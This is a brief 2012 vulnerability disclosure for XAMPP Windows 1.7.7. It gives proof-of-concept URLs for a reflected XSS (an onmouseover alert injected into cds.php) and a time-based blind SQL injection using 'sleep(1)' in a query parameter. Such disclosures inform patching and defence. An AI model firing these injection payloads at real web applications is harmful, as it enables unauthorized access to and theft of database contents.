$ XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities 
$ Author : Sangteamtham 
$ Home : Hcegroup.net 
$ Download :http://www.apachefriends.org/en/xampp-windows.html 
$ Date :06/07/2012 
$ Twitter: http://twitter.com/Sangte_amtham

 XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really 
 very easy to install and to use - just download, extract and start.

2. POC:

XSS Vulnerabilities:


http://localhost/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E --> still not fixed from version 1.7.4

Blind SQL Injection:

http://localhost/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606

$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security 
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XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities
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